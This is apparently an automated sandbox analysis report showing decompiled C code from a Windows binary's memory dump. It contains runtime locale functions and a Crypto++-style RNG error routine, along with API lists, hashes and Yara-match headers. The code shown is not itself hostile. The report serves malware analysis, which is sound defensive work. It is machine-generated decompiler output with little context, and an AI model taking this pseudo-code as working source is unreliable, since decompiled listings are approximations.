                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t34;
                    				short* _t35;
                    				intOrPtr* _t36;
                    				void* _t39;
                    				signed short* _t44;
                    				intOrPtr _t47;
                    				void* _t49;
                    				signed int _t52;
                    				signed int _t58;
                    				signed int _t60;
                    				signed int _t66;
                    				void* _t67;
                    				void* _t70;
                    				void* _t75;
                    				void* _t79;
                    				void* _t85;
                    				intOrPtr _t86;
                    				short* _t88;
                    				void* _t89;
                    				void* _t91;
                    				signed int _t93;
                    				void* _t94;
                    				intOrPtr* _t97;
                    				void* _t111;
                    				void* _t115;
                    				intOrPtr* _t117;
                    				intOrPtr _t120;
                    				signed int* _t121;
                    				intOrPtr* _t124;
                    				signed short _t126;
                    				int _t128;
                    				signed int _t131;
                    				void* _t132;
                    				signed int _t133;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_push(_t85);
                    				_t34 = E01406A01(_t85, __ecx, __edx);
                    				_t86 = _a4;
                    				_t93 = 0;
                    				_v12 = 0;
                    				_t3 = _t34 + 0x50; // 0x50
                    				_t124 = _t3;
                    				_t4 = _t124 + 0x250; // 0x2a0
                    				_t35 = _t4;
                    				 *((intOrPtr*)(_t124 + 8)) = 0;
                    				 *_t35 = 0;
                    				_t6 = _t124 + 4; // 0x54
                    				_t117 = _t6;
                    				_v8 = _t35;
                    				_t36 = _t86 + 0x80;
                    				 *_t124 = _t86;
                    				 *_t117 = _t36;
                    				if( *_t36 != 0) {
                    					E0140F444(0x1429688, 0x16, _t117);
                    					_t132 = _t132 + 0xc;
                    					_t93 = 0;
                    				}
                    				_push(_t124);
                    				if( *((intOrPtr*)( *_t124)) == _t93) {
                    					E0140EDB5(_t86, _t93, _t117, __eflags);
                    					goto L12;
                    				} else {
                    					if( *((intOrPtr*)( *_t117)) == _t93) {
                    						E0140EED8();
                    					} else {
                    						E0140EE3E(_t93);
                    					}
                    					_pop(_t94);
                    					if( *((intOrPtr*)(_t124 + 8)) == 0) {
                    						_t79 = E0140F444(0x1429378, 0x40, _t124);
                    						_t132 = _t132 + 0xc;
                    						if(_t79 != 0) {
                    							_push(_t124);
                    							if( *((intOrPtr*)( *_t117)) == 0) {
                    								E0140EED8();
                    							} else {
                    								E0140EE3E(0);
                    							}
                    							L12:
                    							_pop(_t94);
                    						}
                    					}
                    				}
                    				if( *((intOrPtr*)(_t124 + 8)) == 0) {
                    					L31:
                    					_t39 = 0;
                    					__eflags = 0;
                    					goto L32;
                    				} else {
                    					_t126 = E0140F312(_t94, _t86 + 0x100, _t124);
                    					if(_t126 == 0 || _t126 == 0xfde8 || _t126 == 0xfde9 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
                    						goto L31;
                    					} else {
                    						_t44 = _a8;
                    						if(_t44 != 0) {
                    							 *_t44 = _t126;
                    						}
                    						_t120 = _a12;
                    						if(_t120 == 0) {
                    							L30:
                    							_t39 = 1;
                    							goto L32;
                    						} else {
                    							_t97 = _v8;
                    							_t15 = _t120 + 0x120; // 0x14051fe
                    							_t88 = _t15;
                    							 *_t88 = 0;
                    							_t115 = _t97 + 2;
                    							do {
                    								_t47 =  *_t97;
                    								_t97 = _t97 + 2;
                    							} while (_t47 != _v12);
                    							_t99 = _t97 - _t115 >> 1;
                    							_push((_t97 - _t115 >> 1) + 1);
                    							_t49 = E0140D9C1(_t97 - _t115 >> 1, _t88, 0x55, _v8);
                    							_t133 = _t132 + 0x10;
                    							_t152 = _t49;
                    							if(_t49 != 0) {
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								E013FDA8E();
                    								asm("int3");
                    								_t131 = _t133;
                    								_t52 =  *0x1435234; // 0x78d9f939
                    								_v52 = _t52 ^ _t131;
                    								_push(_t88);
                    								_push(_t126);
                    								_push(_t120);
                    								_t89 = E01406A01(_t88, _t99, _t115);
                    								_t121 =  *(E01406A01(_t89, _t99, _t115) + 0x34c);
                    								_t128 = E0140FBC6(_v40);
                    								asm("sbb ecx, ecx");
                    								_t58 = GetLocaleInfoW(_t128, ( ~( *(_t89 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                    								__eflags = _t58;
                    								if(_t58 != 0) {
                    									_t60 = E0140C591(_t89, _t121, _t128,  *((intOrPtr*)(_t89 + 0x54)),  &_v252);
                    									__eflags = _t60;
                    									if(_t60 == 0) {
                    										_t66 = E0140FCFA(_t128);
                    										__eflags = _t66;
                    										if(_t66 != 0) {
                    											 *_t121 =  *_t121 | 0x00000004;
                    											__eflags =  *_t121;
                    											_t121[2] = _t128;
                    											_t121[1] = _t128;
                    										}
                    									}
                    									_t64 =  !( *_t121 >> 2) & 0x00000001;
                    									__eflags =  !( *_t121 >> 2) & 0x00000001;
                    								} else {
                    									 *_t121 =  *_t121 & _t58;
                    									_t64 = _t58 + 1;
                    								}
                    								__eflags = _v12 ^ _t131;
                    								return E013F268B(_t64, _v12 ^ _t131);
                    							} else {
                    								_t67 = E01406FCE(_t99, _t152, _t88, 0x1001, _t120, 0x40);
                    								_t153 = _t67;
                    								if(_t67 == 0) {
                    									goto L31;
                    								} else {
                    									_t20 = _t120 + 0x80; // 0x140515e
                    									_t91 = _t20;
                    									_t21 = _t120 + 0x120; // 0x14051fe
                    									if(E01406FCE(_t99, _t153, _t21, 0x1002, _t91, 0x40) == 0) {
                    										goto L31;
                    									} else {
                    										_push(0x5f);
                    										_t70 = E014152CB(_t99);
                    										_t111 = _t91;
                    										if(_t70 != 0) {
                    											L28:
                    											_t22 = _t120 + 0x120; // 0x14051fe
                    											if(E01406FCE(_t111, _t156, _t22, 7, _t91, 0x40) == 0) {
                    												goto L31;
                    											} else {
                    												goto L29;
                    											}
                    										} else {
                    											_push(0x2e);
                    											_t75 = E014152CB(_t111);
                    											_t111 = _t91;
                    											_t156 = _t75;
                    											if(_t75 == 0) {
                    												L29:
                    												_t23 = _t120 + 0x100; // 0x14051de
                    												E014142F3(_t111, _t126, _t23, 0x10, 0xa);
                    												goto L30;
                    											} else {
                    												goto L28;
                    											}
                    										}
                    									}
                    								}
                    								L32:
                    								return _t39;
                    							}
                    						}
                    					}
                    				}
                    			}















































                    0x0140f4b8
                    0x0140f4b9
                    0x0140f4ba
                    0x0140f4bd
                    0x0140f4c2
                    0x0140f4c5
                    0x0140f4c7
                    0x0140f4ca
                    0x0140f4ca
                    0x0140f4cd
                    0x0140f4cd
                    0x0140f4d3
                    0x0140f4d6
                    0x0140f4d9
                    0x0140f4d9
                    0x0140f4dc
                    0x0140f4df
                    0x0140f4e5
                    0x0140f4e7
                    0x0140f4ec
                    0x0140f4f6
                    0x0140f4fb
                    0x0140f4fe
                    0x0140f4fe
                    0x0140f502
                    0x0140f506
                    0x0140f54f
                    0x00000000
                    0x0140f508
                    0x0140f50d
                    0x0140f516
                    0x0140f50f
                    0x0140f50f
                    0x0140f50f
                    0x0140f51d
                    0x0140f521
                    0x0140f52b
                    0x0140f530
                    0x0140f535
                    0x0140f53b
                    0x0140f53f
                    0x0140f548
                    0x0140f541
                    0x0140f541
                    0x0140f541
                    0x0140f554
                    0x0140f554
                    0x0140f554
                    0x0140f535
                    0x0140f521
                    0x0140f55a
                    0x0140f66c
                    0x0140f66c
                    0x0140f66c
                    0x00000000
                    0x0140f560
                    0x0140f56d
                    0x0140f573
                    0x00000000
                    0x0140f5a3
                    0x0140f5a3
                    0x0140f5a8
                    0x0140f5aa
                    0x0140f5aa
                    0x0140f5ac
                    0x0140f5b1
                    0x0140f667
                    0x0140f669
                    0x00000000
                    0x0140f5b7
                    0x0140f5b7
                    0x0140f5ba
                    0x0140f5ba
                    0x0140f5c2
                    0x0140f5c5
                    0x0140f5c8
                    0x0140f5c8
                    0x0140f5cb
                    0x0140f5ce
                    0x0140f5d6
                    0x0140f5db
                    0x0140f5e2
                    0x0140f5e7
                    0x0140f5ea
                    0x0140f5ec
                    0x0140f677
                    0x0140f678
                    0x0140f679
                    0x0140f67a
                    0x0140f67b
                    0x0140f67c
                    0x0140f681
                    0x0140f685
                    0x0140f68d
                    0x0140f694
                    0x0140f697
                    0x0140f698
                    0x0140f69c
                    0x0140f6a2
                    0x0140f6aa
                    0x0140f6b9
                    0x0140f6c5
                    0x0140f6d6
                    0x0140f6dc
                    0x0140f6de
                    0x0140f6ef
                    0x0140f6f6
                    0x0140f6f8
                    0x0140f6fb
                    0x0140f701
                    0x0140f703
                    0x0140f705
                    0x0140f705
                    0x0140f708
                    0x0140f70b
                    0x0140f70b
                    0x0140f703
                    0x0140f715
                    0x0140f715
                    0x0140f6e0
                    0x0140f6e0
                    0x0140f6e2
                    0x0140f6e2
                    0x0140f71d
                    0x0140f728
                    0x0140f5f2
                    0x0140f5fb
                    0x0140f600
                    0x0140f602
                    0x00000000
                    0x0140f604
                    0x0140f606
                    0x0140f606
                    0x0140f612
                    0x0140f620
                    0x00000000
                    0x0140f622
                    0x0140f622
                    0x0140f625
                    0x0140f62b
                    0x0140f62e
                    0x0140f63e
                    0x0140f643
                    0x0140f651
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140f630
                    0x0140f630
                    0x0140f633
                    0x0140f639
                    0x0140f63a
                    0x0140f63c
                    0x0140f653
                    0x0140f657
                    0x0140f65f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140f63c
                    0x0140f62e
                    0x0140f620
                    0x0140f66e
                    0x0140f674
                    0x0140f674
                    0x0140f5ec
                    0x0140f5b1
                    0x0140f573

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,014050DE,?,?,?,?,01404B35,?,00000004), ref: 0140F595
                    • _wcschr.LIBVCRUNTIME ref: 0140F625
                    • _wcschr.LIBVCRUNTIME ref: 0140F633
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,014050DE,00000000,014051FE), ref: 0140F6D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                    • String ID:
                    • API String ID: 4212172061-0
                    • Opcode ID: e7844f4f75fb799f473a1588c7438166d8ff4725c052fb12eb8d8a6ea8658d96
                    • Instruction ID: 1202036cb6f526336038572feff129069b67624e691d35c4dcf9e31d1a0f234f
                    • Opcode Fuzzy Hash: e7844f4f75fb799f473a1588c7438166d8ff4725c052fb12eb8d8a6ea8658d96
                    • Instruction Fuzzy Hash: 3561F771500206ABE736AF7BCC45AA777A8EF14710F14043FEA09D72E1EA31E94987A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0140F89E(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				signed int _v252;
                    				intOrPtr _v256;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t50;
                    				signed int _t58;
                    				signed int _t67;
                    				signed int _t69;
                    				signed int _t72;
                    				signed int _t73;
                    				intOrPtr _t75;
                    				signed int _t76;
                    				signed int _t83;
                    				signed int _t85;
                    				signed int _t86;
                    				signed int _t88;
                    				intOrPtr _t89;
                    				void* _t90;
                    				void* _t91;
                    				intOrPtr* _t112;
                    				void* _t116;
                    				intOrPtr* _t118;
                    				signed int _t122;
                    				signed int _t123;
                    				signed int _t124;
                    				signed int _t125;
                    				void* _t126;
                    				signed int* _t127;
                    				int _t129;
                    				signed int _t130;
                    				void* _t131;
                    
                    				_t50 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t50 ^ _t130;
                    				_t91 = E01406A01(_t90, __ecx, __edx);
                    				_t127 =  *(E01406A01(_t91, __ecx, __edx) + 0x34c);
                    				_t129 = E0140FBC6(_a4);
                    				asm("sbb ecx, ecx");
                    				if(GetLocaleInfoW(_t129, ( ~( *(_t91 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
                    					_t58 = E0140C591(_t91, _t127, _t129,  *((intOrPtr*)(_t91 + 0x54)),  &_v248);
                    					_v252 = _v252 & 0x00000000;
                    					__eflags = _t58;
                    					if(_t58 != 0) {
                    						L18:
                    						__eflags = ( *_t127 & 0x00000300) - 0x300;
                    						if(( *_t127 & 0x00000300) == 0x300) {
                    							L39:
                    							_t64 =  !( *_t127 >> 2) & 0x00000001;
                    							__eflags =  !( *_t127 >> 2) & 0x00000001;
                    							L40:
                    							return E013F268B(_t64, _v8 ^ _t130);
                    						}
                    						asm("sbb ecx, ecx");
                    						_t67 = GetLocaleInfoW(_t129, ( ~( *(_t91 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    						__eflags = _t67;
                    						if(_t67 != 0) {
                    							_t69 = E0140C591(_t91, _t127, _t129,  *((intOrPtr*)(_t91 + 0x50)),  &_v248);
                    							__eflags = _t69;
                    							if(_t69 != 0) {
                    								__eflags =  *(_t91 + 0x60);
                    								if( *(_t91 + 0x60) != 0) {
                    									goto L39;
                    								}
                    								__eflags =  *(_t91 + 0x5c);
                    								if( *(_t91 + 0x5c) == 0) {
                    									goto L39;
                    								}
                    								_t72 = E0140C591(_t91, _t127, _t129,  *((intOrPtr*)(_t91 + 0x50)),  &_v248);
                    								__eflags = _t72;
                    								if(_t72 != 0) {
                    									goto L39;
                    								}
                    								_push(_t127);
                    								_t73 = E0140FD1E(0, _t129, 0);
                    								__eflags = _t73;
                    								if(_t73 == 0) {
                    									goto L39;
                    								}
                    								 *_t127 =  *_t127 | 0x00000100;
                    								__eflags = _t127[1];
                    								L37:
                    								if(__eflags == 0) {
                    									_t127[1] = _t129;
                    								}
                    								goto L39;
                    							}
                    							 *_t127 =  *_t127 | 0x00000200;
                    							_t122 =  *_t127;
                    							__eflags =  *(_t91 + 0x60) - _t69;
                    							if( *(_t91 + 0x60) == _t69) {
                    								__eflags =  *(_t91 + 0x5c) - _t69;
                    								if( *(_t91 + 0x5c) == _t69) {
                    									goto L23;
                    								}
                    								_t112 =  *((intOrPtr*)(_t91 + 0x50));
                    								_v256 = _t112 + 2;
                    								do {
                    									_t75 =  *_t112;
                    									_t112 = _t112 + 2;
                    									__eflags = _t75 - _v252;
                    								} while (_t75 != _v252);
                    								__eflags = _t112 - _v256 >> 1 -  *(_t91 + 0x5c);
                    								if(_t112 - _v256 >> 1 !=  *(_t91 + 0x5c)) {
                    									_t69 = 0;
                    									goto L23;
                    								}
                    								_push(_t127);
                    								_t76 = E0140FD1E(_t91, _t129, 1);
                    								__eflags = _t76;
                    								if(_t76 == 0) {
                    									goto L39;
                    								}
                    								 *_t127 =  *_t127 | 0x00000100;
                    								_t69 = 0;
                    								L24:
                    								__eflags = _t127[1] - _t69;
                    								goto L37;
                    							}
                    							L23:
                    							_t123 = _t122 | 0x00000100;
                    							__eflags = _t123;
                    							 *_t127 = _t123;
                    							goto L24;
                    						}
                    						 *_t127 = _t67;
                    						L2:
                    						_t64 = 1;
                    						goto L40;
                    					}
                    					asm("sbb eax, eax");
                    					_t83 = GetLocaleInfoW(_t129, ( ~( *(_t91 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    					__eflags = _t83;
                    					if(_t83 == 0) {
                    						goto L1;
                    					}
                    					_t85 = E0140C591(_t91, _t127, _t129,  *((intOrPtr*)(_t91 + 0x50)),  &_v248);
                    					_pop(_t116);
                    					__eflags = _t85;
                    					if(_t85 != 0) {
                    						__eflags =  *_t127 & 0x00000002;
                    						if(( *_t127 & 0x00000002) != 0) {
                    							goto L18;
                    						}
                    						__eflags =  *(_t91 + 0x5c);
                    						if( *(_t91 + 0x5c) == 0) {
                    							L14:
                    							_t124 =  *_t127;
                    							__eflags = _t124 & 0x00000001;
                    							if((_t124 & 0x00000001) != 0) {
                    								goto L18;
                    							}
                    							_t86 = E0140FCFA(_t129);
                    							__eflags = _t86;
                    							if(_t86 == 0) {
                    								goto L18;
                    							}
                    							_t125 = _t124 | 0x00000001;
                    							__eflags = _t125;
                    							 *_t127 = _t125;
                    							goto L17;
                    						}
                    						_t88 = E0141143C(_t91, _t116, _t129,  *((intOrPtr*)(_t91 + 0x50)),  &_v248,  *(_t91 + 0x5c));
                    						_t131 = _t131 + 0xc;
                    						__eflags = _t88;
                    						if(_t88 != 0) {
                    							goto L14;
                    						}
                    						 *_t127 =  *_t127 | 0x00000002;
                    						__eflags =  *_t127;
                    						_t127[2] = _t129;
                    						_t118 =  *((intOrPtr*)(_t91 + 0x50));
                    						_t126 = _t118 + 2;
                    						do {
                    							_t89 =  *_t118;
                    							_t118 = _t118 + 2;
                    							__eflags = _t89 - _v252;
                    						} while (_t89 != _v252);
                    						__eflags = _t118 - _t126 >> 1 -  *(_t91 + 0x5c);
                    						if(_t118 - _t126 >> 1 ==  *(_t91 + 0x5c)) {
                    							_t127[1] = _t129;
                    						}
                    					} else {
                    						 *_t127 =  *_t127 | 0x00000304;
                    						_t127[1] = _t129;
                    						L17:
                    						_t127[2] = _t129;
                    					}
                    					goto L18;
                    				}
                    				L1:
                    				 *_t127 =  *_t127 & 0x00000000;
                    				goto L2;
                    			}






































                    0x0140f8a9
                    0x0140f8b0
                    0x0140f8be
                    0x0140f8c6
                    0x0140f8d5
                    0x0140f8e1
                    0x0140f8fa
                    0x0140f911
                    0x0140f916
                    0x0140f91f
                    0x0140f921
                    0x0140f9d4
                    0x0140f9dd
                    0x0140f9df
                    0x0140fad1
                    0x0140fad8
                    0x0140fad8
                    0x0140fadb
                    0x0140faeb
                    0x0140faeb
                    0x0140f9f2
                    0x0140fa03
                    0x0140fa09
                    0x0140fa0b
                    0x0140fa1e
                    0x0140fa25
                    0x0140fa27
                    0x0140fa93
                    0x0140fa96
                    0x00000000
                    0x00000000
                    0x0140fa98
                    0x0140fa9b
                    0x00000000
                    0x00000000
                    0x0140faa7
                    0x0140faae
                    0x0140fab0
                    0x00000000
                    0x00000000
                    0x0140fab2
                    0x0140fab7
                    0x0140fabf
                    0x0140fac1
                    0x00000000
                    0x00000000
                    0x0140fac3
                    0x0140fac9
                    0x0140facc
                    0x0140facc
                    0x0140face
                    0x0140face
                    0x00000000
                    0x0140facc
                    0x0140fa29
                    0x0140fa2f
                    0x0140fa31
                    0x0140fa34
                    0x0140fa46
                    0x0140fa49
                    0x00000000
                    0x00000000
                    0x0140fa4b
                    0x0140fa51
                    0x0140fa57
                    0x0140fa57
                    0x0140fa5a
                    0x0140fa5d
                    0x0140fa5d
                    0x0140fa6e
                    0x0140fa71
                    0x0140fa8d
                    0x00000000
                    0x0140fa8d
                    0x0140fa73
                    0x0140fa77
                    0x0140fa7f
                    0x0140fa81
                    0x00000000
                    0x00000000
                    0x0140fa83
                    0x0140fa89
                    0x0140fa3e
                    0x0140fa3e
                    0x00000000
                    0x0140fa3e
                    0x0140fa36
                    0x0140fa36
                    0x0140fa36
                    0x0140fa3c
                    0x00000000
                    0x0140fa3c
                    0x0140fa0d
                    0x0140f8ff
                    0x0140f901
                    0x00000000
                    0x0140f901
                    0x0140f935
                    0x0140f943
                    0x0140f949
                    0x0140f94b
                    0x00000000
                    0x00000000
                    0x0140f957
                    0x0140f95d
                    0x0140f95e
                    0x0140f960
                    0x0140f96d
                    0x0140f970
                    0x00000000
                    0x00000000
                    0x0140f972
                    0x0140f976
                    0x0140f9ba
                    0x0140f9ba
                    0x0140f9bc
                    0x0140f9bf
                    0x00000000
                    0x00000000
                    0x0140f9c2
                    0x0140f9c8
                    0x0140f9ca
                    0x00000000
                    0x00000000
                    0x0140f9cc
                    0x0140f9cc
                    0x0140f9cf
                    0x00000000
                    0x0140f9cf
                    0x0140f985
                    0x0140f98a
                    0x0140f98d
                    0x0140f98f
                    0x00000000
                    0x00000000
                    0x0140f991
                    0x0140f991
                    0x0140f994
                    0x0140f997
                    0x0140f99a
                    0x0140f99d
                    0x0140f99d
                    0x0140f9a0
                    0x0140f9a3
                    0x0140f9a3
                    0x0140f9b0
                    0x0140f9b3
                    0x0140f9b5
                    0x0140f9b5
                    0x0140f962
                    0x0140f962
                    0x0140f968
                    0x0140f9d1
                    0x0140f9d1
                    0x0140f9d1
                    0x00000000
                    0x0140f960
                    0x0140f8fc
                    0x0140f8fc
                    0x00000000

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A60
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0140F8F2
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0140F943
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0140FA03
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    • String ID:
                    • API String ID: 2829624132-0
                    • Opcode ID: d0c2925cecc7ae716b1eaf5e2c2332e0d7329bc6de3b7e476753e6f885db2ebc
                    • Instruction ID: 274071e7d0086bf16d1795b4e42d7d230a0b1c174b31bc7af2acc33759c2acb3
                    • Opcode Fuzzy Hash: d0c2925cecc7ae716b1eaf5e2c2332e0d7329bc6de3b7e476753e6f885db2ebc
                    • Instruction Fuzzy Hash: 6461A371540217ABEB3A9F2AC881BBA77A8EF04300F1041BBDD06C66E5E7749999CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 33%
                    			E013EA130(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v52;
                    				char _v68;
                    				intOrPtr _v72;
                    				char _v76;
                    				char _v92;
                    				intOrPtr _v96;
                    				char _v100;
                    				char _v116;
                    				intOrPtr _v120;
                    				char _v140;
                    				intOrPtr* _v144;
                    				intOrPtr* _v148;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t50;
                    				signed int _t51;
                    				void* _t55;
                    				void* _t57;
                    				void* _t59;
                    				void* _t61;
                    				void* _t63;
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				intOrPtr* _t81;
                    				char* _t84;
                    				intOrPtr _t85;
                    				void* _t96;
                    				signed int _t103;
                    
                    				_t83 = __ecx;
                    				_push(0xffffffff);
                    				_push(E01417CB6);
                    				_push( *[fs:0x0]);
                    				_t50 =  *0x1435234; // 0x78d9f939
                    				_t51 = _t50 ^ _t103;
                    				_v20 = _t51;
                    				_push(_t51);
                    				 *[fs:0x0] =  &_v16;
                    				_t81 = __ecx;
                    				_v144 = __ecx;
                    				_v148 = __ecx;
                    				_t55 = E013E9DA0( &_v140, GetLastError(), 0x10);
                    				_push(_a4);
                    				_v8 = 0;
                    				_push("OS_Rng: ");
                    				_push( &_v116);
                    				_t57 = E013C1E24(_t96);
                    				_v8 = 1;
                    				_t59 = E013C1DF7(_t81, _t83, _t96,  &_v92, _t57, " operation failed with error ");
                    				_v8 = 2;
                    				_t61 = E013C1DF7(_t81, _t83, _t96,  &_v68, _t59, 0x141de1c);
                    				_v8 = 3;
                    				_t63 = E013C1DA9(_t81, _t83, _t55,  &_v44, _t61, _t55);
                    				asm("xorps xmm0, xmm0");
                    				asm("movq [ebx+0x4], xmm0");
                    				_t84 = _t81 + 0x10;
                    				 *_t81 = 0x141a7b8;
                    				 *((intOrPtr*)(_t81 + 0xc)) = 6;
                    				 *((intOrPtr*)(_t84 + 0x14)) = 0xf;
                    				 *((intOrPtr*)(_t84 + 0x10)) = 0;
                    				_v8 = 5;
                    				 *_t84 = 0;
                    				E013C63D3(_t84, _t96, _t63, 0, 0xffffffff);
                    				_t65 = _v24;
                    				if(_t65 >= 0x10) {
                    					_push(_t65 + 1);
                    					_push(_v44);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				_t66 = _v48;
                    				_v24 = 0xf;
                    				_v28 = 0;
                    				_v44 = 0;
                    				if(_t66 >= 0x10) {
                    					_push(_t66 + 1);
                    					_push(_v68);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				_t67 = _v72;
                    				_v48 = 0xf;
                    				_v52 = 0;
                    				_v68 = 0;
                    				if(_t67 >= 0x10) {
                    					_push(_t67 + 1);
                    					_push(_v92);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				_t68 = _v96;
                    				_v72 = 0xf;
                    				_v76 = 0;
                    				_v92 = 0;
                    				if(_t68 >= 0x10) {
                    					_push(_t68 + 1);
                    					_push(_v116);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				_t85 = _v120;
                    				_v96 = 0xf;
                    				_v100 = 0;
                    				_v116 = 0;
                    				if(_t85 >= 0x10) {
                    					_push(_t85 + 1);
                    					_push(_v140);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				 *_t81 = 0x141dde4;
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t81, _v20 ^ _t103);
                    			}









































                    0x013ea130
                    0x013ea133
                    0x013ea135
                    0x013ea140
                    0x013ea147
                    0x013ea14c
                    0x013ea14e
                    0x013ea154
                    0x013ea158
                    0x013ea15e
                    0x013ea160
                    0x013ea16b
                    0x013ea17f
                    0x013ea186
                    0x013ea18a
                    0x013ea191
                    0x013ea196
                    0x013ea197
                    0x013ea1a5
                    0x013ea1aa
                    0x013ea1b8
                    0x013ea1bd
                    0x013ea1c7
                    0x013ea1cc
                    0x013ea1d4
                    0x013ea1d7
                    0x013ea1de
                    0x013ea1e1
                    0x013ea1e7
                    0x013ea1f0
                    0x013ea1f7
                    0x013ea1ff
                    0x013ea203
                    0x013ea206
                    0x013ea20b
                    0x013ea211
                    0x013ea217
                    0x013ea218
                    0x013ea21b
                    0x013ea21b
                    0x013ea220
                    0x013ea223
                    0x013ea22a
                    0x013ea231
                    0x013ea238
                    0x013ea23e
                    0x013ea23f
                    0x013ea242
                    0x013ea242
                    0x013ea247
                    0x013ea24a
                    0x013ea251
                    0x013ea258
                    0x013ea25f
                    0x013ea265
                    0x013ea266
                    0x013ea269
                    0x013ea269
                    0x013ea26e
                    0x013ea271
                    0x013ea278
                    0x013ea27f
                    0x013ea286
                    0x013ea28c
                    0x013ea28d
                    0x013ea290
                    0x013ea290
                    0x013ea295
                    0x013ea298
                    0x013ea29f
                    0x013ea2a6
                    0x013ea2ad
                    0x013ea2b0
                    0x013ea2b1
                    0x013ea2bd
                    0x013ea2bd
                    0x013ea2c4
                    0x013ea2cd
                    0x013ea2e5

                    APIs
                    • GetLastError.KERNEL32(00000010,78D9F939,75D701B0,?,00000000,?,?,?,?,?,?,?,?,01417CB6,000000FF), ref: 013EA171
                      • Part of subcall function 013C1E24: __EH_prolog3.LIBCMT ref: 013C1E2B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
